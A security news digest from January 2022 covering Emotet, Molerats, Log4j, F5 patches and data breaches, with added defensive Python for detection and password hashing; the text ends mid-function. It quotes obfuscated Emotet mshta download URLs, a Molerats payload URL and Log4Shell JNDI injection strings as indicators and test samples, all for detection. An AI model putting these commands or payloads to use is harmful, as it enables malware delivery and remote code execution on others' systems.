Today (24 January 2022): General Security News

ZTNAs Address Requirements VPNs Cannot. Here's Why.

24 January 2022 at 14:52
I recently hopped on the Lookout podcast to talk about virtual private networks (VPNs) and how they've been extended beyond their original use case of connecting remote laptops to your corporate network. Even in this new world where people are using personal devices and cloud apps, VPN continues to be the go-to solution for remote access and cloud access. After my conversation with Hank Schless,

Russian authorities arrested the kingpin of cybercrime Infraud Organization

24 January 2022 at 14:33

Russian authorities arrested four alleged members of the international cyber theft ring tracked as ‘Infraud Organization.’

In February 2008, the US authorities dismantled the global cybercrime organization tracked as Infraud Organization, which was involved in stealing and selling credit card and personal identity data.

The Justice Department announced indictments for 36 people charged with being part of the crime ring. The group has been active since 2010 and was created in Ukraine by Svyatoslav Bondarenko. According to the experts, the activities of the gang caused $530 million in losses.

Bondarenko remained at large, but Russian co-founder Sergey Medvedev was arrested by the authorities in 2018.

Most of the members of the gang were arrested in the US (30), the remaining members come from Australia, Britain, France, Italy, Kosovo, and Serbia.

The indicted leaders of the organization included people from the United States, France, Britain, Egypt, Pakistan, Kosovo, Serbia, Bangladesh, Canada and Australia.

The motto of the Infraud Organization was “In Fraud We Trust”; it had a primary role in the criminal ecosystem as a “premier one-stop shop for cybercriminals worldwide,” explained Deputy Assistant Attorney General David Rybicki.

The Infraud Organization used a number of websites to commercialize the data. It ran a classic and efficient e-commerce operation for the stolen card and personal data, including a rating and feedback system and an “escrow” service for payments in digital currencies like Bitcoin.

Last week, Russian authorities arrested Andrey Sergeevich Novak, an alleged leader of the gang. According to the TASS media agency, three other individuals (Kirill Samokutyaev, Konstantin Vladimirovich Bergman and Mark Avramovich Bergman) are under house arrest.

Russia’s FSB and law enforcement have detained four members of the Infraud Organization hacking group. Its purported founder Andrey Novak is wanted in the US on the accusations of cybercrime. As a source in law enforcement told TASS, Novak was arrested while three other purported hackers are under a house arrest.

“During intelligence-gathering activities, Russian special services with the operational support of the law enforcement and cooperation of the US law enforcement, managed to establish and detain four members of the Infraud Organization hacking group whose main income was the use of stolen credit card data.” reported the TASS,

“The purported founder of the criminal group, Andrey Sergeevich Novak, wanted in the US on the accusations of cybercrime, has been arrested for two months, another three members of the group – Kirill Samokutyaev, Konstantin Vladimirovich Bergman and Mark Avramovich Bergman have been detained under a house arrest,” the source said.

Novak, aka “Unicc,” “Faaxxx,” and “Faxtrod,” will be judged in Russia and will not be extradited to the United States.

“According to an informed source, Russia is not planning to extradite Novak to the US. ‘Russian legislation prohibits an extradition of its citizens to a foreign state,’ the source said. That said, if a foreign citizen wanted abroad is among the arrested, that individual will be extradited following the investigation and court proceedings in Russia, the source added,” continues the press agency.

Recently, the Russian Federal Security Service (FSB) announced that it had shut down the REvil ransomware gang, the group behind a long string of attacks against large organizations such as Kaseya and JBS USA. The FSB claims to have identified all members of the REvil gang and monitored their operations.

The police operation was conducted by Russian authorities following a request by the United States that shared info about members of the gang.

The Russian police arrested 14 alleged members of the ransomware gang and raided 25 addresses seizing computer equipment and cryptocurrency wallets.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, cybercrime)

The post Russian authorities arrested the kingpin of cybercrime Infraud Organization appeared first on Security Affairs.

Emotet spam uses unconventional IP address formats to evade detection

24 January 2022 at 12:05

Experts warn of an Emotet malware campaign using “unconventional” IP address formats in an attempt to evade detection.

Threat actors behind a recent Emotet malware campaign have been observed using “unconventional” IP address formats to evade detection. Trend Micro researchers reported that the threat actors are using hexadecimal and octal representations of the IP address.

“We observed Emotet spam campaigns using hexadecimal and octal representations of IP addresses, likely to evade detection via pattern matching. Both routines use social engineering techniques to trick users into enabling document macros and automate malware execution. Upon receiving these standards, operating systems (OS) automatically convert the values to the dotted decimal quad representation to initiate the request from the remote servers.” reported Trend Micro.

The attack chain is the same used in previous campaigns: threat actors distribute the malware through weaponized Excel documents using Excel 4.0 Macros, a dated feature used to automate repetitive tasks in the popular Office software.

Once the recipient is tricked into enabling document macros, the malicious code contacts a URL obfuscated with carets (“h^tt^p^:/^/0xc12a24f5/cc.html”), with the host incorporating a hexadecimal representation of the IP address, to execute HTML application (HTA) code from a remote host under the control of the attackers.

(Figure: Emotet evasion technique)

Experts pointed out that once executed, the macro also invokes cmd.exe > mshta.exe with the URL as an argument to download and execute an HTA code from the remote host. This specific behavior could be used to detect the ongoing attack.

The researchers also spotted another variant of this malspam campaign that obfuscates the URL with carets, but in which the IP address is written in octal. Decoding the string “h^tt^p^:/^/0056.0151.0121.0114/c.html” into dotted-quad format gives 46[.]105[.]81[.]76.

“Moreover, the unconventional use of hexadecimal and octal IP addresses may result in evading current solutions reliant on pattern matching. But in the same vein, the unusual technique in the command lines can be used as a detection opportunity, with security teams using filters as leverage that can be enabled to treat such IP addresses as suspicious and associate them with malware.” concludes the report that also includes indicators of compromise for these attacks.
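As an added example (not code from the Trend Micro report or from this post), the following Python shows the detection opportunity described above: it removes the carets that cmd.exe strips anyway, converts the hexadecimal, octal, decimal and single-number IP literals that the OS would accept into canonical dotted-quad form, and flags a cmd.exe-to-mshta.exe launch that carries a remote URL. The sample command lines are constructed for the example; the first two reuse the hex and octal hosts quoted above, and the single 32-bit decimal form is included because the OS converts it the same way.

```python
import ipaddress
import re

# Constructed sample command lines (not taken from the report). The first two reuse the
# caret-obfuscated hex and octal hosts quoted above; the third is a benign baseline; the
# fourth uses the single 32-bit decimal form, another literal the OS converts automatically.
SAMPLE_COMMANDS = [
    "cmd.exe /c mshta.exe h^tt^p^:/^/0xc12a24f5/cc.html",
    "cmd.exe /c mshta.exe h^tt^p^:/^/0056.0151.0121.0114/c.html",
    "mshta.exe http://updates.example.invalid/help.hta",
    "cmd.exe /c mshta.exe http://3232235777/p.html",
]

URL_RE = re.compile(r"https?://([^/\s:]+)", re.IGNORECASE)


def strip_carets(cmdline):
    # cmd.exe treats '^' as an escape character and removes it, so the
    # de-obfuscated string is what mshta.exe actually receives.
    return cmdline.replace("^", "")


def normalize_host(host):
    """Return the dotted-quad form of an IP literal in any form inet_aton accepts
    (hex 0x.., octal 0.., decimal, 1 to 4 dot-separated parts), or None if the
    host is a DNS name or an invalid literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        try:
            if part.lower().startswith("0x"):
                values.append(int(part, 16))
            elif len(part) > 1 and part.startswith("0"):
                values.append(int(part, 8))
            else:
                values.append(int(part, 10))
        except ValueError:
            return None
    # inet_aton rule: the last part fills all remaining bytes of the address.
    remaining = 4 - (len(values) - 1)
    head, last = values[:-1], values[-1]
    if any(v < 0 or v > 255 for v in head) or not 0 <= last < (1 << (8 * remaining)):
        return None
    packed = bytes(head) + last.to_bytes(remaining, "big")
    return str(ipaddress.IPv4Address(packed))


def analyze_command(cmdline):
    """Flag the indicators described above: caret obfuscation, a non-canonical
    IP literal in a URL, and cmd.exe handing a remote URL to mshta.exe."""
    clean = strip_carets(cmdline)
    reasons, hosts = [], []
    if "^" in cmdline:
        reasons.append("caret-obfuscated command line")
    for host in URL_RE.findall(clean):
        canon = normalize_host(host)
        hosts.append((host, canon))
        if canon is not None and canon != host:
            reasons.append(f"non-canonical IP literal {host} -> {canon}")
    lowered = clean.lower()
    if "cmd.exe" in lowered and "mshta" in lowered and hosts:
        reasons.append("cmd.exe launching mshta.exe with a remote URL")
    return {"cmdline": clean, "hosts": hosts, "reasons": reasons, "suspicious": bool(reasons)}


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        result = analyze_command(cmd)
        print(("SUSPICIOUS " if result["suspicious"] else "ok         ") + result["cmdline"])
        for reason in result["reasons"]:
            print("    -", reason)
```

Run it over process-creation command lines from EDR or Sysmon event 1; matching on the normalized host rather than the raw string is what defeats the pattern-matching evasion the report describes, and the benign baseline shows that mshta.exe with a plain DNS host alone is not flagged.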

The Emotet banking trojan has been active at least since 2014; the botnet is operated by a threat actor tracked as TA542. The infamous banking trojan was also used to deliver other malicious code, such as the Trickbot and QBot trojans, or ransomware such as Conti, ProLock, Ryuk, and Egregor.

In mid-November researchers from multiple cybersecurity firms ([Cryptolaemus], [GData], and [Advanced Intel]) reported that threat actors are using the TrickBot malware to drop an Emotet loader on infected devices. The experts tracked the campaign aimed at rebuilding the Emotet botnet using TrickBot’s infrastructure as Operation Reacharound.

In December, the Emotet malware was observed directly installing Cobalt Strike beacons to give the attackers access to the target network.

Researchers from AdvIntel believe that the return will have a significant impact on the ransomware operations in the threat landscape, likely “the largest threat ecosystem shift in 2021” and beyond due to three reasons:

  1. Emotet’s unmatched continuous loader capabilities
  2. The correlation between these capabilities and the demands of the contemporary cybercrime market
  3. The return of the TrickBot-Emotet-Ransomware triad resulted from the first two points.

The Emotet botnet was resurrected by its former operator, who was convinced by the Conti ransomware gang. The shutdown of the Emotet operation resulted in the lack of high-quality initial access brokers.

Qbot and TrickBot used Emotet’s service to deploy multiple ransomware strains, including Conti, DoppelPaymer, Egregor, ProLock, Ryuk, and others.

The vacuum left by the Emotet shutdown drove its resurgence; for this reason, its return will have a major impact on the threat landscape.


Hackers Creating Fraudulent Crypto Tokens as Part of 'Rug Pull' Scams

24 January 2022 at 11:09
Misconfigurations in smart contracts are being exploited by scammers to create malicious cryptocurrency tokens with the goal of stealing funds from unsuspecting users. The instances of token fraud in the wild include hiding 99% fee functions and concealing backdoor routines, researchers from Check Point said in a report shared with The Hacker News. Smart contracts are programs stored on the

Emotet Now Using Unconventional IP Address Formats to Evade Detection

24 January 2022 at 07:10
Social engineering campaigns involving the deployment of the Emotet malware botnet have been observed using "unconventional" IP address formats for the first time in a bid to sidestep detection by security solutions. This involves the use of hexadecimal and octal representations of the IP address that, when processed by the underlying operating systems, get automatically converted "to the dotted

High-Severity Rust Programming Bug Could Lead to File, Directory Deletion

24 January 2022 at 06:53
The maintainers of the Rust programming language have released a security update for a high-severity vulnerability that could be abused by a malicious party to purge files and directories from a vulnerable system in an unauthorized manner. "An attacker could use this security issue to trick a privileged program into deleting files and directories the attacker couldn't otherwise access or delete,

Crooks tampering with QR Codes to steal victim money and info, FBI warns

24 January 2022 at 06:40

The FBI warns that cybercriminals are using malicious QR codes to steal victims’ credentials and financial info.

The Federal Bureau of Investigation (FBI) published a public service announcement (PSA) to warn that cybercriminals are using QR codes to steal victims’ credentials and financial info.

QR codes are widely adopted by businesses to facilitate payment. In a classic use case, a business provides customers with a QR code directing them to a site where they can make a payment.

Crooks can replace the QR code with a tampered one and hijack the sender’s payment.

Unsuspecting people who scan the QR codes are redirected to malicious websites crafted to steal login and financial information.

“cybercriminals are taking advantage of this technology by directing QR code scans to malicious sites to steal victim data, embedding malware to gain access to the victim’s device, and redirecting payment for cybercriminal use.” reads the FBI’s PSA. “Cybercriminals tamper with both digital and physical QR codes to replace legitimate codes with malicious codes. A victim scans what they think to be a legitimate code but the tampered code directs victims to a malicious site, which prompts them to enter login and financial information.”

Malicious websites could also deliver malware to the victims’ devices or redirect their payments to accounts under the attackers’ control.

“While QR codes are not malicious in nature, it is important to practice caution when entering financial information as well as providing payment through a site navigated to through a QR code,” the FBI states. 

The FBI announcement includes tips to protect people from this kind of attack:

1. Check the URL obtained by scanning a QR code to make sure it is the intended site and looks authentic. Threat actors could use a malicious domain name that is similar to the intended URL but with typos or a misplaced letter.
2. Double-check any site navigated to from a QR code before providing login, personal, or financial information.
3. If scanning a physical QR code, ensure the code has not been tampered with, such as with a sticker placed on top of the original code.
4. Never download an app from a QR code, and avoid making any payment requested through an unsolicited email that uses social engineering techniques to trick recipients into scanning the embedded QR code.
5. Do not download a QR code scanner app from unofficial stores, to avoid being infected with tainted apps; most phones today have a built-in scanner in the camera app.
6. If users receive a QR code from someone they know, they can reach that person via an alternative channel to verify that the code is from them.
7. Never make payments through a site navigated to from a QR code; manually enter a known and trusted URL to complete the payment instead.

In November, the FBI Internet Crime Complaint Center (IC3) published an alert to warn the public of fraudulent schemes leveraging cryptocurrency ATMs and Quick Response (QR) codes to complete payment transactions. This payment option makes it practically impossible to recover the money stolen through such schemes.

QR codes can be used at cryptocurrency ATMs to transfer money to an intended recipient and crooks started using them to receive payments from victims.

Fraudulent schemes include online impersonation, in which the scammer poses as a familiar entity (e.g., the government, law enforcement, a legal office, or a utility company), romance scams, and lottery schemes (the scammer attempts to convince victims that they have won an award).

In all these fraudulent schemes, scammers provide a QR code associated with the scammer’s cryptocurrency wallet that the victim has to use during the transaction. The victims are instructed to make the transaction at a physical cryptocurrency ATM, where they insert cash to purchase cryptocurrency and then transfer it using the provided QR code.

In these schemes, the scammers are in constant online communication with the victims and provide step-by-step instructions to make the payment.


F5 fixes 25 flaws in BIG-IP, BIG-IQ, and NGINX products

24 January 2022 at 06:15

Cybersecurity provider F5 released security patches to address 25 vulnerabilities affecting its BIG-IP, BIG-IQ, and NGINX products.

Cybersecurity firm F5 announced security patches for 25 vulnerabilities affecting its BIG-IP, BIG-IQ, and NGINX products. Most of the vulnerabilities (23) addressed by the company affect the BIG-IP application delivery controller (ADC); 13 of them have been rated as high-severity issues (CVSS score 7.5).

The issues received CVE identifiers from CVE-2022-23010 to CVE-2022-23032.

The vulnerabilities can cause the termination of the Traffic Management Microkernel (TMM), lead to increased memory resource utilization, freeze virtual servers, or allow the execution of JavaScript code.

F5 addressed the flaws with the release of versions 14.x, 15.x, and 16.x.

The security provider also addressed two high-severity vulnerabilities in BIG-IQ centralized management and NGINX controller API management tracked as CVE-2022-23009 and CVE-2022-23008 respectively.

Regarding the CVE-2022-23008 flaw, an authenticated attacker with access to the ‘user’ or ‘admin’ role can use undisclosed API endpoints on NGINX Controller API Management to inject JavaScript code that is executed on managed NGINX data plane instances.

All the medium-severity vulnerabilities affect BIG-IP, but the CVE-2022-23023 issue also impacts BIG-IQ.

The company has also addressed a low-severity vulnerability, tracked as CVE-2022-23032, that can lead to a DNS rebinding attack.

The United States Cybersecurity and Infrastructure Security Agency (CISA) published a security advisory to encourage administrators to review the F5 security advisory.

“F5 has released its January 2022 Quarterly Security Notification addressing vulnerabilities affecting multiple versions of BIG-IP, BIG-IQ, and NGINX Controller API Management. A remote attacker could exploit these vulnerabilities to either deny service to, or take control of, an affected system.” reads the advisory published by CISA.

“CISA encourages users and administrators to review the F5 security advisory and install updated software or apply the necessary mitigations as soon as possible.”


Yesterday (23 January 2022): General Security News

OpenSubtitles data breach impacted 7 million subscribers

23 January 2022 at 19:39

OpenSubtitles has suffered a data breach, the maintainers confirmed that the incident impacted 7 Million subscribers.

OpenSubtitles is a popular subtitles website; it suffered a data breach that affected 6,783,158 subscribers. Exposed data include email and IP addresses, usernames, the users’ country, and passwords stored as unsalted MD5 hashes.

The administrators of the website became aware of the hack after a hacker notified them via Telegram in August 2021, demanding the payment of a ransom. The attacker also offered to help OpenSubtitles address the security flaws he had found on the website. The administrators agreed to pay the ransom due to the low amount, but after receiving the ransom the attacker never helped them secure the website, and on 11 January 2022 the data was leaked online.

The hack is the result of poor cyber security since the site’s launch in 2006, administrator OSS said. It seems that the threat actor exploited a SQL injection to access the database of the website.

“In August 2021 we received message on Telegram from a hacker, who showed us proof that he could gain access to the user table of opensubtitles.org, and downloaded a SQL dump from it.” reads a data breach notification published on the website. “He asked for a BTC ransom to not disclose this to public and promise to delete the data.

“We hardly agreed, because it was not low amount of money. He explained us how he could gain access, and helped us fix the error. On the technical side, he was able to hack the low security password of a SuperAdmin, and gained access to an unsecured script, which was available only for SuperAdmins. This script allowed him to perform SQL injections and extract the data.”

The financial data of the subscribers haven’t been compromised by the attacker.

Subscribers are advised to change their opensubtitles.org, opensubtitles.com and forum passwords. Subscribers who reused their opensubtitles.org password elsewhere are advised to change it there as well.

The administrators announced improvements to the security of the website, including the introduction of a new password policy.

“The site SHOULD be more secure now, we improved the way users are connecting to the site, the accounts will be locked after some successful logins, we introduced new password policy, we removed session info from table, IP should not be spoofable anymore, Captchas on login, register, password-reset, CSRF on forms, requests will be cancelled if admins change their IP during session, user passwords are saved in safe form using hash_hmac and sha256 algo with salt and pepper, all md5() passwords are deleted. For IT geeks – yes, we are using password_hash(), with peppered sha256 password, BCRYPT and for verification password_verify()” concludes the notification. “Note that our new site, opensubtitles.com was built with stronger security concerns, and already included all the points described above.”

Subscribers can check if their data have been exposed by querying the data breach notification website Have I Been Pwned that received the list of compromised users.
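The password-storage change described in the notice above (an HMAC-SHA256 pre-hash with a server-side pepper, then a salted slow hash, with the unsalted md5() values removed) as an added Python illustration; this is not OpenSubtitles’ code and does not reproduce their PHP. PHP’s password_hash() uses bcrypt, which is not in Python’s standard library, so PBKDF2-HMAC-SHA256 stands in for it here (an assumption made for portability); the sample accounts and the pepper value are constructed for the example.

```python
import hashlib
import hmac
import os

# Constructed sample accounts (not breach data): two users share a weak password.
SAMPLE_USERS = {"alice": "password123", "bob": "password123", "carol": "correct horse"}

# Constructed server-side secret. In a real deployment it lives in the application
# config or a secrets manager, never in the database that a SQL injection can dump.
PEPPER = b"constructed-pepper-keep-out-of-the-db"


def legacy_md5(password):
    # The scheme the notice says was in use: unsalted md5(). Equal passwords give
    # equal hashes, and precomputed tables resolve them directly.
    return hashlib.md5(password.encode()).hexdigest()


def duplicate_hash_groups(users):
    """Group users by legacy hash; a group larger than one means a single
    recovered hash exposes several accounts at once."""
    groups = {}
    for name, pw in users.items():
        groups.setdefault(legacy_md5(pw), []).append(name)
    return {h: names for h, names in groups.items() if len(names) > 1}


def pre_hash(password, pepper=PEPPER):
    # hash_hmac('sha256', password, pepper): the stored value now depends on a
    # secret that is absent from a dumped user table.
    return hmac.new(pepper, password.encode(), hashlib.sha256).hexdigest()


def hash_password(password, pepper=PEPPER, salt=None, iterations=100_000):
    """Salted, slow hash of the peppered pre-hash. password_hash() would use
    bcrypt here; stdlib PBKDF2-HMAC-SHA256 stands in (assumption)."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", pre_hash(password, pepper).encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored, pepper=PEPPER):
    """Counterpart of password_verify(): recompute with the stored salt and
    iteration count and compare in constant time."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(dk_hex)
        iterations = int(iterations)
    except ValueError:
        return False
    dk = hashlib.pbkdf2_hmac("sha256", pre_hash(password, pepper).encode(), salt, iterations)
    return hmac.compare_digest(dk, expected)


def migrate(users):
    """Replace every legacy md5 entry with a peppered, salted hash. A live site
    does this at each user's next successful login; the sample does it eagerly."""
    return {name: hash_password(pw) for name, pw in users.items()}


if __name__ == "__main__":
    print("shared legacy hashes:", duplicate_hash_groups(SAMPLE_USERS))
    store = migrate(SAMPLE_USERS)
    print("alice == bob after migration:", store["alice"] == store["bob"])
    print("verify alice:", verify_password("password123", store["alice"]))
    print("verify wrong:", verify_password("letmein", store["alice"]))
```

The salt makes identical passwords produce different stored values, the iteration count makes each guess expensive, and the pepper means a dump of the user table alone is not enough to verify guesses offline; rotating the pepper invalidates every stored hash, so it has to be versioned if it is ever changed.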


US CISA added 17 flaws to its Known Exploited Vulnerabilities Catalog

23 January 2022 at 18:13

US CISA added seventeen new actively exploited vulnerabilities to the ‘Known Exploited Vulnerabilities Catalog’.

The ‘Known Exploited Vulnerabilities Catalog’ is a list of known vulnerabilities that threat actors have abused in attacks and that are required to be addressed by Federal Civilian Executive Branch (FCEB) agencies.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the Known Exploited Vulnerabilities Catalog and address the vulnerabilities in their infrastructure.

The Cybersecurity and Infrastructure Security Agency (CISA) this week added seventeen actively exploited vulnerabilities to the Catalog.

With this week’s additions, the total number of vulnerabilities included in the catalog reached 341.

CISA is requiring 10 of the 17 vulnerabilities added this week to be addressed by February 1st, 2022.

CVE Number | CVE Title | Due Date
CVE-2021-32648 | October CMS Improper Authentication | 2/1/2022
CVE-2021-21315 | System Information Library for node.js Command Injection Vulnerability | 2/1/2022
CVE-2021-21975 | Server Side Request Forgery in vRealize Operations Manager API Vulnerability | 2/1/2022
CVE-2021-22991 | BIG-IP Traffic Microkernel Buffer Overflow Vulnerability | 2/1/2022
CVE-2021-25296 | Nagios XI OS Command Injection Vulnerability | 2/1/2022
CVE-2021-25297 | Nagios XI OS Command Injection Vulnerability | 2/1/2022
CVE-2021-25298 | Nagios XI OS Command Injection Vulnerability | 2/1/2022
CVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability | 2/1/2022
CVE-2021-40870 | Aviatrix Controller Unrestricted Upload of File Vulnerability | 2/1/2022
CVE-2021-35247 | SolarWinds Serv-U Improper Input Validation Vulnerability | 2/4/2022
CVE-2020-11978 | Apache Airflow Command Injection Vulnerability | 7/18/2022
CVE-2020-13671 | Drupal Core Unrestricted Upload of File Vulnerability | 7/18/2022
CVE-2020-13927 | Apache Airflow Experimental API Authentication Bypass Vulnerability | 7/18/2022
CVE-2020-14864 | Oracle Corporate Business Intelligence Enterprise Edition Path Traversal Vulnerability | 7/18/2022
CVE-2006-1547 | Apache Struts 1 ActionForm Denial of Service Vulnerability | 7/21/2022
CVE-2012-0391 | Apache Struts 2 Improper Input Validation Vulnerability | 7/21/2022
CVE-2018-8453 | Microsoft Windows Win32k Privilege Escalation Vulnerability | 7/21/2022

One of the issues added this week is a vulnerability in the October CMS, tracked as CVE-2021-32648, which was recently exploited in attacks against websites of the Ukrainian government.

CISA also added a vulnerability, tracked as CVE-2021-35247, recently addressed by SolarWinds in Serv-U products, that threat actors are actively exploiting in the wild. The company pointed out that all the attack attempts failed.


Molerats cyberespionage group uses public cloud services as attack infrastructure

23 January 2022 at 14:41

The cyberespionage group Molerats has been observed abusing legitimate cloud services, like Google Drive and Dropbox, as attack infrastructure.

Zscaler ThreatLabz analyzed an active espionage campaign carried out by Molerats cyberespionage group (aka TA402, Gaza Hackers Team, Gaza Cybergang, and Extreme Jackal) that abuses legitimate cloud services like Google Drive and Dropbox as attack infrastructure. Public cloud services are used to host malicious payloads or for command-and-control infrastructure in attacks aimed at targets across the Middle East.

In December 2021, ThreatLabz researchers identified several macro-based MS Office files that were used in attacks against entities in the Middle East. The bait files were employed in cyber espionage attacks; they contain decoy themes related to the geopolitical conflict between Israel and Palestine. Similar bait files were also used in previous cyberespionage campaigns attributed to the Molerats APT group.

Molerats is an Arabic-speaking, politically motivated hacking group that has been active since 2012.

The researchers discovered that the current campaign has been active since July 2021; the threat actors switched the distribution method in December 2021 and applied minor changes to the .NET backdoor.

“The targets in this campaign were chosen specifically by the threat actor and they included critical members of banking sector in Palestine, people related to Palestinian political parties, as well as human rights activists and journalists in Turkey.” reads the analysis published by Zscaler.

The macro code embedded in the weaponized decoy document executes a command via cmd.exe, which in turn runs a PowerShell command to download the stage-2 payload from the URL (“http://45.63.49[.]202/document.html”) and drop it at the path “C:\ProgramData\document.htm”.

It then renames document.htm to servicehost.exe and executes ‘servicehost.exe’.

(Figure: Molerats APT attacks)

The .NET-based malware masquerades as a WinRAR application by using its icon and other resources, and is obfuscated using the ConfuserEx packer.

The backdoor performs the following operations:

1. Collects the machine manufacturer and machine model information using WMI, which is used for execution environment checks and is later exfiltrated to the C2 server.
2. Checks if it should execute in the current execution environment.
3. Creates a mutex with the name of executing binary.
4. Checks if the mutex is created successfully.
5. Determines if it is executed for the first time using the registry key value “HKCU/Software/{name_of_executing_binary}/{name_of_executing_binary}”. 
6. If the registry key doesn’t exist, the code flow goes via a mouse check function which executes the code further only if it detects a change in either of the mouse cursor coordinates. In the end, the mouse check function also creates the same registry key.

The backdoor supports multiple capabilities, such as taking snapshots, listing and uploading files, and running arbitrary commands on the compromised system.

“The major difference between the new attack chain and the old attack chain is seen in the backdoor delivery. Although we are not sure how these RAR/ZIP files were delivered but considering the past attacks they were likely delivered using Phishing PDFs. Additionally, we found a minor variation in the way the backdoor extracted the primary Dropbox account token.” Zscaler ThreatLabz researchers conclude.


Security Affairs newsletter Round 350

23 January 2022 at 08:57

A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

If you want to also receive for free the newsletter with the international press subscribe here.

Pay attention to Log4j attacks, Dutch National Cybersecurity Centre (NCSC) warns
Vulnerabilities in Control Web Panel potentially expose Linux Servers to hack
US Treasury Department sanctions 4 Ukrainian officials for working with Russian intelligence
A bug in McAfee Agent allows running code with Windows SYSTEM privileges
Experts warn of anomalous spyware campaigns targeting industrial firms
Google Project Zero discloses details of two Zoom zero-day flaws
MoonBounce UEFI implant spotted in a targeted APT41 attack
Conti ransomware gang started leaking files stolen from Bank Indonesia
FBI links the Diavol ransomware to the TrickBot gang
Cisco StarOS flaws could allow remote code execution and information disclosure
Crypto.com hack impacted 483 accounts and resulted in a $34 million theft
Red Cross hit by a sophisticated cyberattack
New BHUNT Stealer targets cryptocurrency wallets
SolarWinds Serv-U bug exploited by threat actors in the wild, Microsoft warns
New DDoS IRC Bot distributed through Korean webHard platforms
UK NCSC shares guidance for organizations to secure their communications with customers
CISA warns of potential critical threats following attacks against Ukraine
Box flaw allowed to bypass MFA and takeover accounts
Is White Rabbit ransomware linked to FIN8 financially motivated group?
AlphV/BlackCat ransomware gang published data stolen from fashion giant Moncler
Financially motivated Earth Lusca threat actors target organizations worldwide
Law enforcement shut down the VPN service VPNLab used by many cybercriminal gangs
Microsoft releases Windows out-of-band emergency fixes for Win Server, VPN issues
A small number of Crypto.com users reported suspicious activity on their wallet
Oracle Critical Patch Update for January 2022 will fix 483 new flaws
Zoho fixes a critical vulnerability (CVE-2021-44757) in Desktop Central solutions
High-Severity flaw in 3 WordPress plugins impacts 84,000 websites
Experts warn of attacks using a new Linux variant of SFile ransomware
Kyiv blames Belarus-linked APT UNC1151 for recent cyberattack
European Union simulated a cyber attack on a fictitious Finnish power company
Microsoft spotted a destructive malware campaign targeting Ukraine
A new wave of Qlocker ransomware attacks targets QNAP NAS devices
Threat actors stole $18.7M from the Lympo NFT platform


Before yesterday: General Security News

Pay attention to Log4j attacks, Dutch National Cybersecurity Centre (NCSC) warns

22 January 2022 at 20:34

The Dutch National Cybersecurity Centre (NCSC) warns organizations of risks associated with cyberattacks exploiting the Log4J vulnerability.

The Dutch National Cybersecurity Centre (NCSC) warns organizations to remain vigilant on possible attacks exploiting the Log4J vulnerability.

According to the Dutch agency, threat actors will continue to attempt to exploit the Log4Shell flaw in future attacks.

“Partly due to the rapid actions of many organizations, the extent of active abuse appears to be not too bad at the moment. But that doesn’t mean it stops there. It is expected that malicious parties will continue to search for vulnerable systems and carry out targeted attacks in the coming period. It is therefore important to remain vigilant.” states the Dutch NCSC agency. “The NCSC advises organizations to continue to monitor whether vulnerable systems are used and to apply updates or mitigating measures where necessary. In addition, the NCSC advises directors to stay alert by informing themselves about Log4j and the possible impact of abuse on business continuity.”

The risk that cybercriminal groups and nation-state actors could exploit Log4j vulnerabilities in future attacks is still high.

Recently Microsoft posted a warning about a new campaign from a China-based actor it tracks as DEV-0401 to exploit the Log4Shell vulnerability on VMware Horizon systems exposed on the internet, and deploy Night Sky ransomware.

In recent weeks other ransomware gangs have exploited Log4Shell in their attacks; the Conti ransomware gang was the first group observed exploiting the CVE-2021-44228 flaw, starting in mid-December.

In the same period, Bitdefender researchers discovered that threat actors were attempting to exploit the Log4Shell vulnerability to deliver the new Khonsari ransomware on Windows machines.

The NCSC will continue to share information through its website and its GitHub repository; the latter contains operational information regarding the Log4Shell vulnerability in the Log4j logging library, especially CVE-2021-44228 / CVE-2021-45046, and also covers CVE-2021-4104 / CVE-2021-45105.
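The NCSC's advice to keep monitoring is easier to act on with a concrete check. The following is an added example, written for this page and not code from the NCSC, Microsoft or any vendor named above: it scans web-server access-log lines for Log4Shell exploitation attempts. It goes one step beyond a plain search for "${jndi:" by URL-decoding each line and collapsing the Log4j lookup obfuscations seen in the wild (${lower:j}, ${upper:n}, ${::-j}, ${env:X:-j}) before matching. The log lines are constructed for the demonstration; the IP addresses are documentation ranges, not real attackers.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Lines 2-4 carry
# Log4Shell payloads; lines 3 and 4 use lookup obfuscation that a literal
# "${jndi:" search would miss. Line 5 is a harmless Log4j lookup.
SAMPLE_LOG = [
    '203.0.113.9 - - [22/Jan/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [22/Jan/2022:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [22/Jan/2022:10:00:03 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - [22/Jan/2022:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/c}"',
    '203.0.113.9 - - [22/Jan/2022:10:00:05 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# An innermost lookup: "${...}" whose body contains no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we are really looking for once obfuscation has been peeled away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(m: re.Match) -> str:
    """Evaluate one innermost Log4j lookup the way Log4j 2.x would."""
    body = m.group(1)
    # "${name:-default}" evaluates to the default; "${::-x}" is the empty-name form.
    if ":-" in body:
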